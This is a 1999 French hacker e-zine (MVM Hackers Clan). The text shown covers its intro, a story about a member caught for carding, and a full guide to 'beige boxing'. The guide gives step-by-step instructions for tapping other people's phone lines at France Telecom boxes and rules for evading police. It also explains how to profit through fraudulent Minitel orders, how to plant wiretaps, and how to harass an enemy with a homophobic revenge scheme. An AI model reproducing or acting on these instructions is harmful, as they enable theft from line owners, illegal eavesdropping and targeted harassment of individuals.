Copy Link
Add to Bookmark
Report

MVM Hackers Clan

eZine's profile picture
Published in 
MVM Hackers Clan
 · 11 Oct 2020

  


---M * V * M---
Hackers
Clan

Bienvenu a vous tous, membre de l'Underground Phrankofone.
Ceci etant le tout Ier Zines du groupe nous vous demanderons d'etre tolerant
temp bien pour l'OrtoGraffe que pour son contenu.
Apres Moulte Probleme dut a des pratique soit disans illegal, la M*V*M peut
enfin s'exprimer au grand jour, avec un site (legal) http://www.chez.com/mvm
Nous savont parfaitemment que nous ne pourons jamais egaler les grand mag
tel que Noway & Noroute, qui on bercer notre jeunesse de newbie assouaffer
d'info. mais on vas essayer par l'intermediaire de ce zine de vous enseigner
quelque pratique lier au HCP

Presentation du groupe.
~~~~~~~~~~~~~~~~~~~~~~~
---M * V * M--- Hackers Clan est un groupe qui ce mobilise pour faire avancer
la scene afin de preparer le maximum de monde pour la "Online Revolution".
Les diferent membre sont: ~~~~~~~~~~~~~~~~~~

ThreaT: Createur de la M*V*M
Hacking & phreaking
mise en forme de l'article
habitant de LYON

Angus: createur de phreakazoide (groupe qui n'existe plus)
Hacking & Phreaking
http://www.multimania.com/mustain

Maverick: Phreaking & Hustling
Meilleur pote de ThreaT
habitant de LYON

Bolliop: Hacking & Phreaking
createur du site web www.chez.com/mvm
habitant des BOUCHES DU RHONE

Massilia: cracking & Phreaking
habitant des BOUCHES DU RHONE

CD13h: HAcking & Phreaking
Membre de HAckarchia

Shank, DreaD & CoqS: Phreaking & Hustling
habitant de LYON
Hustler de la MVM
Appeler les "scanner swapper"

DAms Killer & Alex Crazy: Crackerz & HAckerz
habitant de LYON
jumeaux
http://www.multimania.com/dabcorp


ainsi que 2 bon pote que j'ai rencontrer sur le net! j'ai bien sur nomer
DEDL.... & GA.....

"alors ded! t'a reussi a te faire CocaCola.com ?"

sans oublier notre infografiste.


LA SCENE FRANCAISE EST ENDORMIE! LA FRANCE VIEILLI! LA FRANCE NE SUIT PAS!


***********************
! O N L I N E !
! R E V O L U T I O N !
***********************


DiskLamer!
aucun membre de La ---M * V * M--- Ne peut etre tenu responsable quand a la
pratique de ce qui est decrit dans ses article.

on vas pas commencer a ce la jouer 3£1T3 et vous balancer plein de commande
UNIX a l'ecran avec des passwd decripter pres a etre hacked
ceci est le premier Zine, donc si vous chercher des truc Linux, fo attendre
le 2eme!
on vas commencer doucemment, donc place au

~~~~~~~~
|SOMMAIRE|
~~~~~~~~

|-----------|----------------------------------------------|---------------|
|-----------|----------------------------------------------|---------------|
| N° | TITRE | AUTEUR |
|-----------|----------------------------------------------|---------------|
|-----------|----------------------------------------------|---------------|
| 1 | HISTOIRE D'UN MEMBRE | ANONYME |
|-----------|----------------------------------------------|---------------|
| 2 | LE BEIGE BOXING | ThreaT |
|-----------|----------------------------------------------|---------------|
| 3 | AOL HTML USER ACCOUNT | ThreaT |
|-----------|----------------------------------------------|---------------|
| 4 | VMB POUR LES NEWBIEZ | ANGµS |
|-----------|----------------------------------------------|---------------|
| 5 | BOITE AU LETTRE DES PTT | MavericK |
|-----------|----------------------------------------------|---------------|
| 6 | SOCIAL PHOTO | BoLLioP |
|-----------|----------------------------------------------|---------------|
| 7 | PRISE TELEPHONIK | BoLLioP |
|-----------|----------------------------------------------|---------------|
| 8 | LES VIRUS V.B.I | ThreaT |
|-----------|----------------------------------------------|---------------|
| 9 | INITIATION A B.O | BoLLioP |
|-----------|----------------------------------------------|---------------|
| 10 | LES UNDERSITEZ | ThreaT |
|-----------|----------------------------------------------|---------------|
| 11 | COUR DE CRACK I | MassiLiA |
|-----------|----------------------------------------------|---------------|
| 12 | COUR DE CRACK II | MassiLia |
|-----------|----------------------------------------------|---------------|
| 13 | CYBER AGRESSION | ThreaT |
|-----------|----------------------------------------------|---------------|
| 14 | DEMO DE SOCIAL POUR TROYEN | ThreaT |
|-----------|----------------------------------------------|---------------|
| 15 | SOCIAL AU TELEPHONE | BoLLioP |
|-----------|----------------------------------------------|---------------|
| 16 | HACKER LE CABLE | DreaD |
|-----------|----------------------------------------------|---------------|
| BONUS | DIVERS PETIT TRUCS & ASTUCES | ********* |
|-----------|----------------------------------------------|---------------|
| FIN | LES MOTS DE LA FIN | ********* |
|-----------|----------------------------------------------|---------------|



-->1<--
HISTOIRE D'UN MEMBRE
--------------------

Dans l'article qui va suivre, je ne vais poa parler de Hacking/Phreaking,
mais a la demande de beaucoup de poa mal de personne, je vais vous faire
par d'une histoire qui nous est arrive : RESULTAT, un gars de la bande
c'est fait chope...
Morale : soyez prudent avec le carding...


un jour, j'arrive de ce putain de lycee
de merde, j'ouvre le frigo pour me prendre une biere (putain le pack
de 26 tombe vite bordel !), pi je pose mon cul sur le canape et j'allume
la teloche, il etait environs 18h30...Apres avoir vider ma KRO et zaper
entre ce putain de BigDill et autres conneries, le telephone sonne...
DRING...Je decroche (Le dialogue qui suis n'est poa la copie conforme de la
Conversation mais elle s'en approche...):
--DECROCHAGE--
MOA :"allo ?"
MEC :"Oui boujour, ici Mr *****, du bureau des investigations de Paris,
pourrais-je savoir a qui ais-je affaire ??"
MOA :"Heu, c'est vous qui appellez monsieur, vous avez donc mon numero,
donc vous savez qui je suis ! c'est une blague ?? non ?"
MEC :"Est ce que j'ai l'air de plaisanter ?? vous avez recu plusieurs
appels de la region de Parisienne cette semaine, des appels qui ont duree
plus de 1h30 pour certain !!"
MOA :"Mais de quoi sagit t'il au juste ?"
MEC :"Nous sommes a la recherche d'un jeune qui se noment ****,qui telephone
avec des carte telephonique rechargeable par carte bancaire, et il est
possible de recharger ces cartes avec un numero de carte bancaire..."
(J'etait au courant t'en fait poa !!!)
(J'me decide donc a po trop rigoler avec ca, donc a lacher des infos mais
en aucun cas faire la balance !!!)(De toute maniere pourkoi faire la balance,
il connaissait deja tout sur lui !)
MEC :"Voyez vous de quoi il s'agit ?? connaissez se jeune ?"
(Bon alors la j'essaye de poa jouer au con alors je me presente, je savais
bien entendu de quoi il voulait parler...)
La, le mec me coupe, et sachant que j'habitait loin de Paris, il me dit :
MEC :"Ca va que vous habitez loin sinon je vous demanderais de venir preter
serment. Ou avez vous rencontrez **** ?"
MOI :"Je l'ai rencontrer sur internet, nous avions les memes centres
d'interet etc... et il se trouve qu'on s'entendait bien alors on s'est ecrit"
MEC :"Vous vous etes ecrit ?"
MOI :"Oui ecrit par E-Mail" (GROS LAMER !!!)
MEC :"de quoi vous parliez ?"
MOI :"Ben souvent musique..."
MEC :"Vous aimiez le meme genre de muzic ??"
MOI :"non." (MERDE GROSSE GAFFE !) "Mais je lui racontais les concerts que
j'allais voir !" (J'ESSAYE DE ME RATTRAPPER !)
(puis soudain, une idee !) "Ensuite **** voulait savoir comment j'avais
fait ma PageWeb et comme c'etait dure d'expliquer par Mails, je lui ai
donne mon numero de telephone, et ensuite il m'a appelle plusieur fois..."
MEC :"D'accord, et toi as tu son numero de telephone ?"
MOI :" non " (BIENSUR KE OUI PAUVRE CON !)
MEC :"Tu ne t'ai jamais demande comment il pouvait se permettre de telephoner
aussi souvent a une aussi longue distance !"
MOI :"Au debut non, puis ensuite ca ma paru louche, mais je lui jamais demande.."
MEC :"d'accord, bon ecoutes, j'ai d'autres numero a verifier, j'ai verifier
le tien en premier car c'est le tien qui revenait le plus souvent dans ma
liste. Je te demanderais de m'appeller dans 2 jours, j'aurais d'autres
questions a de posser..."
MOI :"d'accord"
MEC :"alors tu appelles au 01******** et voila je suis, je vous le repetes
Mr *****"
MOI :"Entendu, aurevoir"
MEC :"Aurevoir et merci de votre collaboration"
--RACROCHAGE--
PUTAIN !!!!! MERDE !!!!
Une envie envie de gerber me viens soudain, avec en plus de ca un horrible
degout de la vie et un sentiment inexplicable ! POURKOI ?? Parce moi aussi
aussi j'avais fait poa mal de conneries avec ces cartes bancaires ! Autant
que mon pote qui alle se faire pecho !
A ce moment la, je suis alle me coucher, ben oui a 19h00 ca arrive ! et j'ai
eu du mal a dormir biensur bordel ! Le lendemain au lycee, et plus specialement
en cour, pas le moyen de faire quoi ke ce soit ! Toujour je pensais a cette
histoire ! Putain mon pote va surement faire de la tole, et p'tet moi aussi...
Le soir, une tonne de devoir a faire, j'men bat les couilles, je ferais rien !
Le lendemain (mercredi : 2 jours ecoules), lycee encore, j'adresse la parole
a personne, je reflechis encore, encore ,encore...
A une 13h00, je rentre chez moi et je pris la sage decision de rappeler le
keufli:
--DECROCHAGE--
MEC :"Allo"
MOI :"Oui, Bonjours vous etes Mr ***** ??"
MEC :"c'est moi oui !"
MOI :"Vous m'avez appelle il y a deux jours au sujet de ..."
MEC :"Oui je me rappelle, alors de notre cote, les choses on avance, je
sais que tu n'as absolument rien a voir dans l'histoire, et donc tu avais
affaire a un escro...Un escro qui te telephonait a l'aide d'une carte
telephonique rechargeable par carte bancaire, et comme ca ton amis a tire
plus de 10000 Francs sur le compte d'une personne agee..." (SALE VIEILLE !!!)
"et donc je n'aurais plus besoin de toi, donc je te remercie de ta collaboration et aurevoir.
MOI :"Aurevoir"
--RACROCHAGE--
Plus de nouvelle pendant un bon moment puis le 25 decembre :
DRING !!!
--DECROCHAGE--
MOI :"allo ?"
POTE :"ouep, salut c'est moi" (c'etait mon pote)
MOI :"Putain mais t'es fou d'appeller bordel, ya les flics qui m'ont appele !!!"
POTE :"Je sais, ils savent tous ils vont bientot debarquer chez moi..."
MOI :"putain fait chier, on a trop abuser gars bordel ! et t'appelles d'ou
et comment au fait ?"
POTE :"C'est la premiere fois que je t'appelle legalement d'un cabine !
haha" (rire force) "en fait je t'appellai pour te souhaiter un joyeux noel"
MOI :"Putain c vraiment poa le moment mais merci kan meme ! Je dois m'casser,
putain j'peux poa te dire grand chose si ce n'est BONNE CHANCE gars ! et
ouaih on est alle trop loin..."
POTE :"Ouai on aura passe de bon moments ensemble a delire sur le net, c
claire...bon a+ et j'te dit pas a la prochaine...Il faut qu'on arrete..."
MOI :"Ok, j'pense aussi, a+ et fais gaffe a toi."
--RACROCHAGE--
Depuis ce jour jusqu'a aujourd'hui Samedi 27 Fevrier 1999, aucune nouvelle,
surement qu'il est au trou en plus d'une bonne amande...

Voila, ceci prouve a quelle point il faut etre prudent avec ca !

Mais putain QUELLE INJUSTICE !!! en effet, dans ce pays de merde il est
posible de vider un compte bancaire qu'avec le numero 16 chiffres de la
carte puis la date de validite !!! ya poa un probleme la ?? N'importe qui
pourrait le faire !
Il faudrais que l'info soit accesible a tous et la, vous imaginez l'anarchie
dans le pays ! Tous les compte serais Hacker, les flics seraient deborde !
TOUT LE MONDE ENCULERAIT TOUT LE MONDE !!!!
Ca serait le vrai bordel comme je l'aime !!!
Mais non, il faut etre curieux pour avoir l'info, et donc la curiosite
amene t-elle a la prison ???
BORDEL !
ENCULE !
PUTAIN !
FUCK !

ANONYME.
~~~~~~~~


-->2<--
LE BEIGE BOXING
---------------
Cet article est deja aparu dans PhreaKazoiDe II, Mais comme je suis pas sur
qu'il est encore en circulation vue le nombre de Probleme ,
j'ai decider de le remetre ici.


06/09/98 by ThreaT



TOUTE LES CHOSE QUI FAUT CONNAITRE POUR VIVRE DANS CE MONDE
TERRIBLE DU PHREAKING QU'EST

ß ß
Û Ûßß ÛßßÜ Ûßß Û Ûßßß Ûßß ÛßßÜ ÛßßÛ ÛÛ ÛÛ Û ÛÛ Û Ûßßß
Û Ûß ÛÛÛß Ûß Û Û ßÛ Ûß ÜÜ ÛÛÛß Û Û ÛÛ Û Û Û Û Û ßÛ
ÛÛÛÝÛÜÜ ÛÜÜÛ ÛÜÜ Û ÛÜÜÛ ÛÜÜ ÛÜÜÛ ÛÜÜÛ ÛÛ ÛÛ Û Û ÛÛ ÛÜÜÛ
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

DisCLAiMer
ÄÄÄÄÄÄÄÄÄÄ
Je tiENt JustE a DIrE quE je Ne suIs Pas RespONsabLe Des COnneRIes Que Vous
AllEz FAire A cAuse De Ce doCUmmEnt
Si Un jOUr lES FLic VIenNENt vOUs CHerCHeZ En COurs POur vOUS fOUtrE en GArdE
A VUe, VOus Ne VIenDRez Pas PLeuREz En diSant Que Vous AveZ aPPris SA Sur
LE NET ! Que cE sOIt BIEn CLAiRE..

ArrEtons Le Blabla Et ParlONs UN Peu De LA TechNIque De phReaKing La Plus
SimpLE a AppLIquer, MAis AusSi LA PLus DANGEREUSE. J'ai Nommer


LE BEIGE-BOXING !!!!

Table des matieres...

0/Avant propos!
1/Le beige boxing, qu'est c'que c'est?
2/comment pratiquer le beige-boxing?
3/Les danger du beige boxing !
4/Comment eviter de se faire chopper?
5/Le buisness avec le beige-boxing, y'a t'il des sous a ce faire?
6/un reseau de beige-boxer, comment faire?
7/Comment faire pour que la ville soit a l'heure du beige box rules
8/Phreak PBX with Beige boxing
9/Se venger avec le beige-box
10/The end


0/AVANT PROPOS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Je tient a mettre tout de suite les chose au point
j'entend deja les phreaker qui liront ce document
"On s'en fout de ton beige box mec! j'en faisait quand j'avais 4 ans"
ou d'autre qui diront
"c trop dangereux mec le beige BOX, Y'a pas moyen que j'en fasse"
ALORS LA JE REPOND STOP, le beige box et a la fois la technique de phreaking
la plus simple, mais aussi, la plus compliquer
La plus simple car du point de vue realisation, c'est juste un proceder est
un investissemment de depart sans plus.
et la plus compliquer pour survivre!, eviter les flic et autre danger qui
menace votre liberter.
de plus le beige box ne vout sert pas qu'a telef gratos, Il peut y avoir
plein d'extantion (hacker les PBX, SE FAire DU BL‚,VeNgENcE peRSO,....)
Donc, personne ne peut dire que le beige box et l'art le moin noble du phreaking


MAIS PAS DE PANIQUE LES GARD, JE VAIS VOUS APPRENDRE COMMENT DEVENIR UN ELITE
DU BEIGE-BOX


1/LE BEIGE-BOXING, QU'EST C'QUE C'EST?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Le beige boxing, c'est l'art de se connecter PHYSIQUEMMENT a une ligne
telephonique qui ne nous apartient pas!
ce proceder tres facile a realiser, a pour avantage de
1: pouvoir choisir ses victime
2: avoir plusieur victime
Il est tres important de choisir ses victime !
effectivemment, votre durer de vie depanderas de leur moyen financier
EX, une entreprise se rendras moin compte du piratage de sa ligne
qu'un particulier h‚h‚, logique, mais pas toujours apliquer!

Mais maintenant...

2/COMMENT PRATIQUER LE BEIGE BOXING ?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Je vais vous espliquer comment telephoner gratos! en 2 temp 3 mouvemment
sans gros moyen financier, mais si vous voulez allez plus loin! il
vas faloir cracher des tunes!! arf arf arf

allez GO!

---MATOS---
Un telephone normal! De preferance a cadran numerique
trois pince crocos
un fer a souder
1 cerveau
2 main
C'est tout pour l'instant!!!


---MONTAGE----
prenez votre telephone et demonter la prise !
vous allez voir 4 fils
un bleu, un blanc, un rouge, et un jaune

OK, maintenant je tient a signaler que le jaune on s'en fout, vous pouver donc
le couper. Quand au autre, c'est le rouge et le blanc les plus important
le bleu n'est utiliser que ocasionellemment.

BON, soudez les pince crocos au bout des trois fils et mettez votre telephone
dans un sac a dos.

POURQUOI UN SAC A DOS ?
parce que vous allez sortir dehors (la nuit de preferance vers 1H du mat)
cherchez un boitier anti foudre FT
pour les reconnaitre, c'est tres simple. ce sont des petites boite blanche
que l'on trouve sur les poteaux ou monter avec des bornes en beton
celles si portes l'insigne de FT (a ne pas comfondre avec les compteur EDF)
Vous voyer de quoi je parle? BIEN
maintenant ouvrer le boitier. une multitude de fils s'offre a vous.
choisisser un fil blanc et un fil gris, c'est bon? maintenant denuder
les sans les couper et connecter respectivemment la pince croco blanche
sur le fil blanc, et la pince croco rouge sur le fil gris.
decrocher le telephone; vous avez la TONE? NON! choisiser un autre fil
blanc et un autre fil gris; c'est bon maintenant? vous avez la tonaliter?
OUI! Tres bien, maintenant composer le 17 et insulter les gens qui vous reponde
arf arf, je rigole!

mais a quoi sert la pince croco bleu?
si vous appeller cher qq1 est que vous avez votre interlocuteur qui parait
loin du combiner quand il parle! ne lui gueler pas dessus pour qu'il parle
plus fort! chercher un fil bleu dans le boitier et connecter y la pince croco
bleu. c'est tout
alors, SIMPLE NON, il suffit juste de connaitre le truc.
mais le tout n'est pas la
parlons plutot du plus gros...

3/LES DANGER DU BEIGE-BOXING
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Et OUI, vous etes sur un nuage car vous arriver a telephoner gratos!
et ben vous aller vite en redessendre car tout n'est pas rose..
effectivemment il y a DANGER.
a peu pres au bout de 2 mois qq personne vont commencer a porter plainte
et les flic vont commencer a vous rechercher.
vous allez me dire "j'men fout, je change de borne tout les jour! y peuvent
pas me retrouver les con" Et ben si, et je vais vous en apprendre une bonne
le PIRE ennemie du beige-Boxer, ce ne sont pas les flic, ni les victime,
ni les gens qui vout voie vous connecter dans la rue. NON, le pire ennemie
du beige-boxer, c'est sa FEMME!! (???)
mais pourquoi sa femme?
pour plusieur raison:
1/les femme adore le telephone, elle vont tout faire pour que vous les
appelliez
Femme de Maverick: "Tu paye le telephone oui ou non ?"
Maverick: "ben non!"
Femme de Maverick: "donc tu peux m'appeler sans que sa te coute rien?"
Maverick: "Ben, c'est a dire que.."
Femme de Maverick: "Tu ne veut pas m'appellez!"
Maverick: "si cherie mais.."
Femme de Maverick: "Mais tu ne m'aime pas, c'est sa"
Maverick: "si cherie mais.."
Femme de Maverick: "si tu ne m'appelle pas, je casse!"
Maverick: "BOn d'accord, je t'appellerais"

et voila comment on se fait embobiner, et comment 2 semaine appres on ce
retrouve au poste de police
Flic:"vous savez pourquoi vous ete ici?"
ThreaT:"BEn NON!"
Flic:"nous travaillons depuis 2 ans sur une affaire de piratage et vous en
"etes le principale suspect"
ThreaT:"Ha bon,pourquoi?"
Flic: "Vous avez bien un amis qui s'appelle Maverick"
ThreaT: "heeuu, oui"
Flic: "qu'est cque vout fouter cher vous avec 3 telephone desosser"
ThreaT: "Ben je m'interesse a l'electronique"
Flic: "et pourquoi vous avez des cable de 5 metre?"
ThreaT: "heuu, je me suis construit une ralonge"
Flic: "vous vous foutez de moi!"
ThreaT: "je ne me permetrais pas monsieur l'inspecteur"
Flic: "Bon allez, arrete ton balour, nous avons le temoinage de la femme"
"de Maverick qui dit que son mec fait partit d'un reseau de pirate"
"dont tu est le leader"
ThreaT: "mais comment avez vous fait pour la trouver?"
Flic: "Quand Maverick l'appellait d'un telephone pirate, celle si"
"s'empressait de rapellez chez lui! en epluchant les facture"
"nous avons trouver maverick et sa femme!"
ThreaT: "Bon d'accord, j'avoue! mais maverick appelais sa femme dans une"
"cabine telephonique pour ne pas etre tracer"
Flic: "Je sais! mais nous savont qui appelle dans les cabines telephonique"
"grace a un proceder que seul la police connait"
ThreaT: "Oula, vous m'en apprennez une bonne la!"
Flic: "h‚ h‚, qu'est stu croit petit, que l'on est con"
ThreaT: "Ben ouai"
Flic: "comment?"
ThreaT: "Non rien!"
Flic: "Bon, je prefert"

Voici un court resumer de ce qui m'est arriver quand j'avais 15 ans.
Pendent ma garde a vue, j'ai bien simpatiser avec les poulet, et leur est
meme reparer une becane! du cout il mon espliquer toute mes erreur et
comment j'aurais du faire pour ne pas qu'il me retrouve! MeRCI La PoLiCE!
(il sont vraiment con!). DONC retenez que le beige box est extremmement
dangereux! mais la une question se pose.

4/COMMENT EVITER DE SE FAIRE CHOPPER ?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Si vout respecter a la lettre chacune des regle si dessous, je vous prommet
longue vie dans le beige-boxing!

Now, This Is The gOLdeN RUleS

1. ne commencer le BB qu'apres minuit
2. ayer au moin 8 borne par personne! que vous ferrez tourner tout les jour
3. ne telephoner pas a vos amis, telephoner plutot a des serveur vocal!
4. si vous telephoner a une connaissance, dite lui qu'elle ne vous rappelle
sous aucun pretexte <-Very impotant
5. pour etre sur de ne pas se faire chopper comme maverick, ne telephoner
Plus! ne faite que du minitel
6. faite de petite pause, phreaker pendent 1 mois puis arreter vous 2 semaine
7. si vous avez une voiture, casser vous a la campagne!

Explication detailler
pour la regle 1, n'allez pas faire du BB a 3H de l'apres midi ou bien a 11h
du soir, vous pourier vous faire voir et en plus, le proprio de la ligne
pourait vouloir telephoner et ainsi voir qu'il y a piratage.
Vous trouver sa evidant mais quand j'etait newbie, je suis allez telephoner
a 2H de l'apremme avec maverick, et une femme a decrocher et nous a demander
de quiter sa ligne car elle voudrait bien telephoner! (imaginer l'embiance..)

pour la regle 2, ne vous acharner pas 2h par jour sur une seule borne, trouver
en d'autre putain si vous ne voulez pas que les flic vous choppe sur le faite!
il vous faudra 8 borne minimum, alors chercher avans de passer a l'act!

pour la regle 3, n'utiliser le telephone que pour faire des jeux ou scanner des
PBX, AU PIRE! appellez des gens que vous ne connaissez pas et foutez vous
de leur gueules. Mais n'appellez jamais qq1 que vous connaissez de pres ou de
loin. meme pas dans une cabine et encore moin sur son portable!

pour la regle 4, si par une raison qqonque, vous avez enfrein la regle 3
presiser bien a la personne appellez qu'elle ne VOUS RAPPELLE JAMAIS!
meme sur votre tatoo. demander lui qu'elle vous reponde par lettre
CECI EST TRES IMPORTANT! NE PAS SE FAIRE RAPPELLEZ CHEZ SOIT

pour la regle 5, arreter le telephone, sa pue! passer au niveau au dessus
et ne faite QUE du minitel. c'est plus interressant est beaucoup moin
dangereux! effectivemment, les flic ne peuvent pas vous retrouver sur le
minitel, alors BE HaPPY on The MInitEL!

pour la regle 6, ne faite pas du BB tous les soir NON STOP pendent 1 ans!
faite des pause bordel! faite par ex 2 mois non stop puis arreter pendent
1 mois histoire que les Keuf croient que vous avez lacher l'affaire.
SA aussi, sa augmente votre durer de vie

Pour la regle 7, il est evidant qu'il vaut mieux pratiquer le BB a la campagne
que dans la ville.

Voila, les regle sont etabli! si vous les suivez a la lettre, je vous garanti
au moin 4 ans penard a grater des uniter.

Mais une question ce pose !, dans la regle 5 je vous dit de ne faire que du
minitel, n'est ce pas? et j'entend deja les petit curieux me dire
newbie :"comment on fait pour faire du minitel ? Faut que j'enmenne mon minitel
"dans la rue ? mais ou je vais le brancher ?"
ThreaT : "t'inquiete jinete , je vais t'esplique tout sa dans....."

5/LE BUISNESS AVEC LE BEIGE-BOXING, Y'A T'IL DES SOUS A CE FAIRE ?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Bonne question! y'a t'il des sous a se faire avec le beige boxing?
mais BIEN SUR qu'il y a du pognon a se faire, il vous brule les doigts
vous pouver vous monter un Clan de swapper avec livraison a domicile
produit sous selophane et autenticiter du produit NON PIRATE
Mais comment? Grace au minitel bien sur! mais comment faire du minitel?

J'esplique!
La, vous allez passez au niveau au dessus, il vas falloir donc faire un
gros investissemment de depard!

--MATOS A ACHETER POUR FAIRE DU MINITEL---
1.Un ordinateur portable qqonque avec une batterie de longue durer
2.une carte modem PCMCIA 33600, (sa suffirat), avec un emulateur minitel
(perso j'utilise Timtel!)

newbie : "Mais sa coute cher tous sa! mais qu'est ce que je vais en foutre?"

ThreaT : "tres simple mon gard!, maintenant que tu a du vrai matos de phreaker"
"tu vas pouvoir travailler. Installe ta carte PCMCIA et ton emul"
"et prend un sac a dos, refait la procedure de ton telephone avec"
"le cordon telephonique de ta carte modem. connecte ton portable"
"balance timtel! et VOILA, tu est sur un beau minitel gratos!!"

newbie : "Kewl, mais comment je vais pour me faire du pez?"

ThreaT : "tres simple, compose le 3617 SOL, ou d'autre serveur de se type"
"et commande du matos,des cdrom et autre subtiliter!"
"envoye la marchandise a des LAME qui t'aurons joyeusemment donner"
"leur nom et addresse, et le tour est jouer. le mec recoie son matos"
"directemment cher lui, sous selophane! et il est content! et il te"
"donne des sous pour que tu recommance! mais toi tu t'en fout vue que
"tu ne paye pas le minitel, alors tu empoche du benef"
"de plus, quand tu est bien dans le buiseness les serveur minitel "
"t'envoye des liste, et des mot de passe pour que tu accede a du nouveau"
"matos encore plus cher! DONC plus de benef, tu comprend"

newbie : "trop Kewwwwwwwl, mais attend, si je suis tout seul, je vais mettre
"des jour et des jour pour satisfaire tout mes client?"

ThreaT : "EXACT JACK!, c'est pour sa qu'il te faut un reseau de beige-boxer"


6/UN RESEAU DE BEIGE-BOXER, COMMENT FAIRE ?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
pour ce faire beaucoup de pognon, rien ne vaut un beau petit reseau de
beige-boxer, c'est facile, c'est un peu cher, mais sa peu raporter gros!
alors comment faire quand on est 5 ou 6 pelo, et qu'on veut se faire du
pognon ?
TouT, d'abord, il vas faloir economizer pour pouvoir acheter le premier portable
Une fois celui si aqueri, il faut trouver au moin 8 bornes et ce connecter
tous les soir sur chacune d'elle en commandant des CDrom ou du matos hardware.
au bout de qq mois, vous pourez vous achetter un deuxiemme portable avec votre
benef. ne prener pas le nouveau P2,300 MMX, sa sert a rien! un 486 suffit
pour ce que vous voulez faire, on en trouve pour pas tros chere!
perso j'ai un P100, mais il ne me sert pas qu'a faire du Beigebox. enfin
c'est a vous de voir! une fois que vous avez ce nouveau joujou, passer le
a une autre personne qui pratiqueras comme vous des connection sur minitel.
mais il faudra que lui aussi, se trouve d'autre borne et si il a une voiture
il vaut mieux qu'il travail dans un autre secteur! et ainsi de suite jusqua
ce que tout le monde et un portable, plus vous y serez, et plus vous aurez de
client, donc plus de beneF. mieux vaut que vous soyer 2 pour allez vous connecter
vous pourez mieux reperer si qqun vous a remarquer, mais surtout changer bien
de borne tout les soir afin de ne pas vout faire tracer.
mais une autre question ce pose
newbie :"ouai, mais sa me fait chier de changer de borne tout les soir"
"c'est trop chiant mec"


7/COMMENT FAIRE POUR QUE LA VILLE SOIT A L'HEURE DU BEIGE BOX RULES ?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
pour que votre ville soit a l'heure du beige box rules, il y a plusieur
facon de proceder.
acheter vous de petit connecteur agree france telecom et bracher les directemment
dans les bornes telephonique! comme sa, vous aller plus vite pour la connection
et si vous voyer que votre connecteur a ete enlever c'est que cette borne a ete
reperer par les flic. DONC, arreter de travailler dans le secteur !
un autre truc marrant pour que votre ville vous soit devouer corp et ame
acheter vous une dixaine de petit telephone FT a 50 balles, chercher dans
les rues des plaques FT, ouvrer les et connecter le telephone sur les fil!
laisser le telephone dans la caviter et refermer la plaque FT, faite sesi
avec d'autre plaque! comme sa, vous avez pratiquemment des cabines telephonique
gratuite, utilisable a tout moment! Vous pouver ausse mettre des gens sur
ecoute comme sa, il suffit de faire un petit montage et de le remplacer par
le telephone! (pour le montage, regarder dans pirate mag)
pour seux qui aurais un serveur payant! fabriquer vous avec une EPROM un petit
montage qui appelleras votre serveur, tout les soir pendant 2h, et brancher
le dans les plaque FT, il y a encore plein d'astuce mais je nevais pas tout
enumerer, a vous d'avoir de la creativiter bordel!
effectivemment, le beige box peu vous servir a pirater encore un autre systeme
de telecomunication

8/PHREAK PBX WITH BEIGE BOXING
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Et oui mes enfant! le phreaking attire le phreaking, car comme si ce n'etait
pas assait de pirater un lame innocent, vous pouver encore pirater un autre
systeme a partire de sa ligne pirater! but why?
parce que les PBX a Nøvert sont ultra proteger et donc dur a hacker, la plupart
du temp il faut faire du social engering pour imfiltrer un PBX vert
alors que les PBX en 801,802 et 803, sont beaucoup moin proteger vue que chaque
fois que vous appellez vous cracher du pognon! et c'est la que le beige box
intervient, car vous pouver scanner en toute tranquiliter un PBX payant et
l'utiliser de chez vous une fois que vous aurez trouver l'oudial, et oui!
le beige box vous evite de payer le scann! arf arf arf
n'abuser quand meme pas, sa ce remarque tout de suite sur une facture.
BON maintenant qu'on a parlez buiseness je vais vous apprendre un petit
truc distrayant histoire de decompresser

9/SE VENGER AVEC LE BEIGE-BOX
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Comme tout le monde, vous devez avoir des ennemies, le beige boxing peut
vous aider a leur faire une petite crasse

fouter vous sur minitel et connecter vous a un serveur de cul de type
un serveur GAY. faite vous passer pour votre enemmie en disant que vous
aimez les grosse bite poilu dans l'anus et donner le Nø de telephone de votre
ennemmie a tout le monde! preciser quand meme, d'appelez a partir de 1H du
matin et que vous adorer les mec qui insulte au telephone!
votre ennemie, n'arreteras pas de se faire agresser tout les soir par des homo
qui vont suremment chercher sont adresse par minitel pour pouvoir lui peter
l'anus en direct!!


10/THE END...
ÄÄÄÄÄÄÄÄÄÄÄÄÄ

Et voila, je vous ai a peut pres appris tout ce qu'un newbie doit savoir
sur le beige-box, je tient quand meme a remercier Angus, Le hacker du
groupe PHREAKAZOIDE qui m'a permis d'ecrire cet article et aussi a
Phreakol, qui un phreaker plein de ressource.


